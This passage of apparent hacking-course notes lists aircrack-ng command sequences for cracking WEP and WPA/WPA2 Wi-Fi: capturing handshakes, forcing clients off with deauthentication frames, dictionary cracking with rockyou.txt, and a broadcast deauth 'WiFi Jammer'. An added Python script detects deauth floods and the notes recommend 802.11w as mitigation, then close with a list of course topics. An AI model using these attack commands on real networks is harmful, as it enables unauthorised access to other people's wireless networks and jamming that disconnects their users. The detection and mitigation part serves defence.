- Note the target's BSSID and channel number from the airodump-ng output
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- Wait until the beacon count reaches 25,000
- #aircrack-ng aranjit-01.cap
- WPA|WPA2
- ========
- When there is a new device connecting
- -------------------------------------
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- Note the target's BSSID and channel number from the airodump-ng output
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- It will help you to get the WPA handshake
- #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
- When there is no new device connecting
- -------------------------------------
- #iwconfig
- #airmon-ng
- #airmon-ng start wlan0
- #iwconfig
- #airodump-ng wlan0mon
- Note the target's BSSID and channel number from the airodump-ng output
- #airodump-ng --bssid <Target's BSSID> -c <Target's Channel Number> -w <File Name In Which I want To Capture the Beacons --> aranjit> wlan0mon
- It will help you to get the WPA handshake
- #aireplay-ng -0 10 -a <Router's BSSID> -s <Station's BSSID> wlan0mon
- This lets us capture the handshake
- #aircrack-ng -w /usr/share/wordlists/rockyou.txt aranjit-01.cap
- WiFi Jammer
- ===========
- #aireplay-ng -0 0 -a <Router's BSSID> -s FF:FF:FF:FF:FF:FF wlan0mon
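- The deauthentication frames the command above floods the air with are also what a wireless IDS watches for. As an added example (not part of the original notes and not code from the aircrack-ng project), the Python below counts deauth/disassoc management frames per source MAC over a sliding window and raises an alert when the rate is far beyond what an access point sends in normal operation. FRAMES is a constructed capture with made-up MAC addresses; a real feed would come from a monitor-mode capture through a library such as scapy, which this example does not include.

```python
"""Added example: flag a deauthentication flood in captured 802.11 management frames.

Not part of the original notes or of aircrack-ng. FRAMES is a constructed
sequence of (timestamp, frame type, subtype, source, destination) tuples with
made-up MAC addresses; in practice the tuples would be filled from a
monitor-mode capture (scapy, tshark), which is not part of this example.
"""
from collections import defaultdict, deque
from typing import Deque, Dict, Iterable, List, Tuple

MGMT = 0            # 802.11 frame type 0: management
BEACON = 8          # management subtype 0x8
DISASSOC = 10       # management subtype 0xA
DEAUTH = 12         # management subtype 0xC
BROADCAST = "FF:FF:FF:FF:FF:FF"

Frame = Tuple[float, int, int, str, str]   # (t_seconds, type, subtype, src, dst)

AP = "AA:BB:CC:00:00:01"        # constructed
CLIENT = "DE:AD:BE:EF:00:01"    # constructed

# Constructed traffic: 3 s of ordinary beacons, then a burst of broadcast
# deauths at 100 frames/s (the pattern the "WiFi Jammer" command produces),
# then one isolated deauth to a single client, which is normal AP behaviour.
FRAMES: List[Frame] = (
    [(i * 0.1, MGMT, BEACON, AP, BROADCAST) for i in range(30)]
    + [(3.0 + i * 0.01, MGMT, DEAUTH, AP, BROADCAST) for i in range(64)]
    + [(4.0, MGMT, DEAUTH, AP, CLIENT)]
)


def detect_deauth_floods(frames: Iterable[Frame],
                         window: float = 1.0,
                         threshold: int = 20) -> List[dict]:
    """Return one alert per source MAC whose deauth/disassoc count within any
    `window` seconds exceeds `threshold`. A real AP sends a handful of these
    per client event; dozens per second, especially to the broadcast address,
    is the signature of a forged flood."""
    recent: Dict[str, Deque[Tuple[float, str]]] = defaultdict(deque)
    alerts: Dict[str, dict] = {}
    for t, ftype, subtype, src, dst in sorted(frames):
        if ftype != MGMT or subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[src]
        q.append((t, dst))
        while q and t - q[0][0] > window:      # slide the window forward
            q.popleft()
        if len(q) > threshold and src not in alerts:
            to_broadcast = sum(1 for _, d in q if d == BROADCAST)
            alerts[src] = {
                "src": src,
                "at": t,
                "deauths_in_window": len(q),
                "to_broadcast": to_broadcast,
            }
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_deauth_floods(FRAMES):
        print(f"deauth flood from {alert['src']} at t={alert['at']:.2f}s: "
              f"{alert['deauths_in_window']} frames in 1 s, "
              f"{alert['to_broadcast']} of them to broadcast")
```

- Alerting is only half the answer: a flood that is detected still disconnects clients. Enabling 802.11w (Protected Management Frames) on the access point and clients is the actual mitigation, since with PMF deauthentication and disassociation frames must be integrity-protected and a station discards forged ones.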
- Desktop Security
- Information Gathering
- Phases of Hacking
- Cyber Laws
- Malware Illustration
- Social Engineering and Phishing Attacks
- OWASP Top 10 Attacks
- SQL Injections
- XSS --> Cross Site Scripting
- Network Exploitation and Security
- Wireless Network Exploitation and Security
- Mobile Device Exploitation
- mimikatz
- Vault 7: year zero
- GET and POST